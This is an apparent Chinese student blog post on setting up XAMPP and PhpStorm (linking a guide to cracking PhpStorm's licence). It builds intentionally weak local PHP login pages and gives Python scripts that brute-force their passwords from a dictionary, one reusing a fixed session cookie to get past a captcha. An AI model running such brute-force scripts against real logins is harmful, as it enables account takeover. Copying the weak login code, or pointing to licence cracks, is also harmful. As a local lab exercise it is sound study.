• XAMPP、PHPstorm和PHPcharm和Windows环境下Python搭建+暴力破解


    XAMPP的安装和使用

    一、什么是XAMPP?

    XAMPP是最流行的PHP开发环境。 XAMPP是完全免费且易于安装的Apache发行版,其中包含Apache、MariaDB、PHP和Perl。

    类似XAMPP的服务器套件还有很多,我用过的还有UPUPW,它们都极大的简化了开发环境的配置。

    十六款免费的服务器套件的介绍介绍了主流的免费服务器开发套件。

    二、安装

    xampp下载地址:http://www.xampp.cc/

    安装没什么好说的,“下一步”直到安装完成。

    三.使用

    双击xampp安装目录下的xampp-control.exe,打开xampp控制面板。
    点击Apache的“Start”按钮,启动Apache服务。 Apache服务的端口默认是80和443,如果电脑上装有虚拟机,443端口会被虚拟机占用,导致Apache服务启动失败。这种情况的修改方法如下:
    ① 打开任务管理器,找到找到vmware-hostd.exe进程,结束它。
    ② 打开VMware虚拟机,选择菜单“编辑”——>"首选项",如下图所示。

    至于如何查看哪个程序占用了哪个端口,可以点xampp控制面板右侧的“Netstat”按钮,也可以在命令提示符窗口输入netstat -ano指令来查看这几个端口是否被占用。若占用,记住PID,然后在任务管理器里对于相应的PID,结束即可。如果任务管理器的列表中没有PID这一列,点击任务管理器的菜单“查看”——>“选择列”,勾选PID即可。
    比较通用的修改方法如下: (这种方法直接改xampp的配置文件。)
    如果80端口被占用
    将xamppapacheconf这个目录下的httpd.conf 文件中 所有80换成其他值。
    将xamppapacheconfextra这个目录下的 httpd-vhosts.conf 所有80换成其他值。
    如果是443端口被占用
    将XAMPPapacheconfextra这个目录下的httpd-ssl.conf 所有443换成其他值。
    点击MySQL的“Start”按钮,启动MySQL服务。 (如果电脑上之前安装过MySQL,xampp的MySQL服务启动失败) 正确的修改方法是: ①在命令提示符窗口输入regedit指令,打开注册表编辑器。
    ②找到HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMySQL,将ImagePath的数据修改成xampp中mysq的位置,再次点击MySQL的 “Start”按钮,mysql服务正常启动。
    如果MySQL的默认端口3306被占用,修改方法如下:
    ①修改占用该端口的外部程序,修改方法前面说过。 或者
    ②点击MySQL的 “Config”按钮,选择“my.ini”,打开该配置文件,并将其中的3306改成其他值。

    测试
    在浏览器输入http://localhost/dashboard/,出现如下页面,测试成功。

    ** 如果发现网页找不到,那就把之前改的端口(比如我改的是8001)放在localhost后面,即:localhost:8001**

    除此之外我们还要搭建PHPSTORM环境!!! 根据这个老哥的博客来完成环境的搭建

    [安装XAMPP](http://www.cnblogs.com/Jason-Jan/p/7906773.html)
    [安装并破解PhpStorm](http://www.cnblogs.com/Jason-Jan/p/7918449.html)


    实践(我们分两个难度)

    • 暴力破解,顾名思义,就是不断使用不同的账号和密码去猜测,猜测到成功为止,以达到目的猜测出真实密码。举个例子说,web应用中常常存在一些登陆页面,只要web应用中对尝试登陆次数没有限制,或者没有足够强大的人机识别(验证码)的话,就可以进行暴力破解,本文主要涉及web应用上登陆的暴力破解。如下图:

    暴力破解测试页面

    源码的部分是一个表单post给一个php页面,形象一点也就是说在html页面填好账号密码,然后数据就会传给php来处理。

    Html部分如下: (原参考博客该部分有误,已作出修改)

    <!DOCTYPEhtml>
    <html>
    
    <head>
        <meta charset="utf-8">
        <title>暴力破解测试页面</title>
    </head>
    
    <body>
    
    <div align="center">
        <h1>暴力破解测试页面-low</h1></div>
    
    <form action="Loginl.php" method="post" name="form">
    
        <fieldset>
    
            <legend><b>请输入信息</b></legend>
    
            <p>用户名:<input type="text" name="name" id="name"></p>
    
            <p>密码:<input type="password" name="password" id="password"></p>
    
            <p><input type="submit" value="登录"></p>
        </fieldset>
    </form>
    
    </body>
    
    </html>
    

    php部分如下

    <!DOCTYPEhtml>
    <html><head><meta charset="utf-8">
    
    <?php
    /**
     * Created by PhpStorm.
     * User: mac
     * Date: 2018/7/5
     * Time: 下午3:20
     */
    
    session_start();
    $pwd=$_POST["password"];
    $name=$_POST["name"];
    
    if($name=="")
    {die("用户名不能为空");}
    if($pwd=="")
    {die("密码不能为空");}
    if($name=="admin"&&$pwd=="1234")
    {echo"登陆成功!!!";setcookie("user","$name",time()+3600);}
    else{echo"登陆失败";}
    ?>
    
    </head>
    </html>
    
    • 遇到的问题及解决
      点击登录按钮后php页面502错误
      解决:这个时候我们把xampp中的php.exe链接进去就ok了
      点击登录按钮后发现post不了psd和username
      解决:试了半天不知道为什么,于是我把post换成了get。发现可行,但是post对于web来说一般更安全,所以不推荐使用get,容易被漏洞利用。
      最后我下了最新版本的PHPstorm就ok了。。。

    只需要使用requests模块来进行请求访问,使用bs4来判断登陆是否成功,附上代码:

    无验证码暴力破解的python脚本

    #!/usr/bin/python
    # -*- coding: UTF-8 -*-
    
    
    import requests
    from bs4 import BeautifulSoup
    
    
    def crack(username='admin', password='1234566'):  # 定义一个暴力破解的函数
        print('正在尝试账号:%s,密码:%s' % (username, password))  # 回显输出
        url = 'http://localhost:63342/untitled2/Loginl.html'  # 定义需要暴破请求的地址
        datas = {'name': 'admin', 'password': password}  # 定义暴力破解的账号和密码
        header = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'Connection': 'keep-alive',
            'Upgrade-Insecure-Requests': '1'
        }  # 定义访问数据包的请求头,因为如果有防护网站会限制ua
        req = requests.post(url, datas, headers=header, )  # 发送请求
        # print req.content
        html = BeautifulSoup(req.content, "lxml", from_encoding="utf-8")  # 定义响应内容为html
        res = (''.join(html.stripped_strings).encode("unicode_escape").decode("string_escape")).decode(
            'unicode-escape').encode('utf-8')  # 获取响应信息
        print
        res
        if '登陆成功' in res:  # 判断是否登陆成功
            exit("密码为%s" % password)
    
    
    if __name__ == '__main__':
        for psw in open('C:/Users/apple/Documents/WeChat Files/fcg12580/Files/dictionary.txt', 'r').read().splitlines():  # 暴力破解的字典
            crack(password=psw)
        pass
    
    • 这一部分太简单了,我们很容易就实现破解。 所以不多描述。

    • 我们通过PGPstrom和PGPcharm实现了上一部分,然后在第二个部分的时候,我们发现PHP页面的url是会随时根据验证码的变化而变化的,那为了解决这个不稳定的问题,当然我们也可以选择在本机系统下直接运行,这个时候就需要用到xampp了。


    暴力破解+验证码

    具体实现步骤如下:

    1. 我们在xampp的安装目录下,新建一个文件夹把我们实验所需的文件放进去:

      图MyProject

    2. 确保Xampp的apache打开。

    3. 通过localhost:8001/LoginMid.html访问我们编写好的页面

      大家可以看到在此页面中我们加入了验证码。 稍后贴出相关代码

    4. 我们输入相关信息,验证一下代码。发现通过xampp直接运行,我们的url是可以直接使用的

    5. 配置好了页面,我们要开始攻击了。编写好python脚本,同时注意:

    6. 为了能在windows下直接使用python命令,我们需要在系统的环境变量里添加python路径!把它变成我们的一部分!

    7. 脚本编好了,软件可以帮我们下载需要的插件,但是在windows环境下,我们需要在cmd中手动下载,首先我们进入到/Python27/Scripts/中,在这个路径下我们可以使用其中的pip进行我们的下载:

      PS:如果自带的pip的版本过低需要更新,跟着命令行的提示一步步走就行了

    8. 在windows下使用python与在软件内相同,由于我们的代码使用了request模块、bs4以及lxml,这都是我们现在需要下载的。
      pip install requests

      pip install bs4

      pip install (你所下载的lxml的保存路径)/lxml-4.2.3-cp27-cp27m-win_amd64.whlPS:lxml自己在网上下载,要对应python版本,我下的是2.7的)

    9.保证我们代码里的信息与网页信息一样:

    10.接下来我们直接执行:python attack_3.py


    该过程代码

    LoginMid.html

    <!DOCTYPEhtml><html><head><meta charset="utf-8">
    
        <title>暴力破解测试页面</title>
    
    </head>
    
    <body>
    
    <div align="center"><h1>暴力破解测试页面-难度medium</h1></div>
    
    <form action="LoginMid.php" method="post"onsubmit="return judge();" name="form">
    
        <fieldset>
    
            <legend><b>请输入信息</b></legend>
    
            <p>用户名:<input type="text" name="name" id="name"></p>
    
            <p>密码:<input type="password" name="password"id="password"></p>
    
            <p>验证码:<input type="text" name="yzm" id="yzm">
    
                <img src="yzm.php" onclick="this.src= 'yzm.php?nocache='+Math.random()" style="color:white"></p>
    
            <p><input type="submit" value="登录"></p>
        </fieldset>
    </form>
    </body>
    </html>
    

    LoginMid.php

    
    <!DOCTYPEhtml>
    
    <html>
    
    <head>
    
    <metacharset="utf-8">
    
    <?php
    /**
     * Created by PhpStorm.
     * User: mac
     * Date: 2018/7/5
     * Time: 下午4:03
     */
    session_start();
    
    
    
    $pwd=@$_POST["password"];
    
    $name=@$_POST["name"];
    
    $yzm=@$_POST["yzm"];
    
    
    
    if($name=="")
    
    {die("user can't be NULL");}
    
    if($pwd=="")
    
    {die("password can't be NULL");}
    
    if($yzm=="")
    
    {die("yzm can't be NULL");}
    
    if($yzm!=$_SESSION['VCODE']){
    
    die("<script>alert('yzm error!!');location='".$_SERVER['HTTP_REFERER']."'</script>");}
    
    if($name=="admin"&&$pwd=="1114")
    
    {echo"success!!!";setcookie("user","$name",time()+3600);}
    
    else
    
    {echo"failed";
    
    }
    
    ?>
    
    </head></html>
    

    yzm.php

    <?php
    /**
     * Created by PhpStorm.
     * User: mac
     * Date: 2018/7/5
     * Time: 下午4:04
     */
    session_start();
    
    Header("Content-type:image/PNG"); //提示用户生成PNG的图片文件
    
    $im= imagecreate(60,25);   //建一个基于调色板的图像
    
    $back= imagecolorallocate($im, 245, 245, 245); //分配颜色
    
    imagefill($im,0,0,$back); //图像填充
    
    $vcodes= "";
    
    
    
    for($i=0;$i<4;$i++){
    
        $font=imagecolorallocate($im,0,0,0);  /*rand()随机函数*/
    
        $authnum=rand(0,9);//验证码的随机数
    
        $vcodes.=$authnum;
    
        imagestring($im,5,9+$i*10,5,$authnum,$font);
    
    }
    
    $_SESSION['VCODE']=$vcodes;
    
    
    
    imagepng($im);  //把图片输出到浏览器文件
    
    imagedestroy($im);  //释放图片资源
    
    ?>
    

    Attack_3.py

    #!/usr/bin/python
    # -*- coding: UTF-8 -*-
    
    
    import requests
    from bs4 import BeautifulSoup
    
    RCode = '6989'
    
    
    def crack(username='admin', password='1234566'):
        print'trying user:%s,pwd:%s,yzm:%s' % (username, password, RCode)
        # cookie={'security': 'low' , 'PHPSESSID' :'rkp71r263ucl7gg2i7t878ieli'}
        url = 'http://localhost:8001/MyProjects/LoginMid.php'
        datas = {'name': 'admin', 'password': password, 'yzm': RCode}
        header = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8',
            'Connection': 'keep-alive',
            'Cookie': 'PHPSESSID=rkp71r263ucl7gg2i7t878ieli',  # 不带cookie验证码会无法使用
            'Referer': 'http://localhost:8001/MyProjects/LoginMid.html',
            'Upgrade-Insecure-Requests': '1'
        }
        req = requests.post(url, datas, headers=header, )
        # print req.content
        html = BeautifulSoup(req.content, "lxml", from_encoding="utf-8")
        res = (''.join(html.stripped_strings).encode("unicode_escape").decode("string_escape")).decode(
            'unicode-escape').encode('utf-8')
        print res
        if 'success!!!' in res:
            exit("pwd is %s" % password)
    
    
    if __name__ == '__main__':
        # crack()
        for psw in open('C:/Users/apple/Documents/WeChat Files/fcg12580/Files/dictionary.txt', 'r').read().splitlines():
            crack(password=psw)
    pass
    

    总结

    这其中要用到字典,我用的字典是自己生成的。路径在python脚本中会用到哦!!!
    网上的都要积分,穷苦人民还得自己动手。
    这次实践大大的增强了我的动手能力,不断地百度,不断地报错,不断地调试,终于还是实现啦!
    同时我发现:

    1. 要注意各软件或者插件的版本!使用时一定要对应!
    2. phpstorm和phpcharm都是需要.exe文件支持的,使用时记得导入路径!
    3. 代码调试的时间远比你想象的要长!
    4. 需要一个好的partner带来正面影响!
    5. 学习一定要以快乐的心情去学习!
  • 相关阅读:
    Matlab实现bwlabel函数(区域标记)功能
    Matlab实现medfilt2函数功能
    Matlab实现基于频域对二维信号的低通滤波
    Matlab实现基于频域对一维信号利用傅里叶低通滤波平滑
    Matlab实现直方图规定化
    Matlab实现直方图均衡化
    Matlab实现imresize函数功能
    lc279贪心
    lc347 解法
    numpy中的np.mat(1)
  • 原文地址:https://www.cnblogs.com/fcgfcgfcg/p/9272927.html
Copyright © 2020-2023  润新知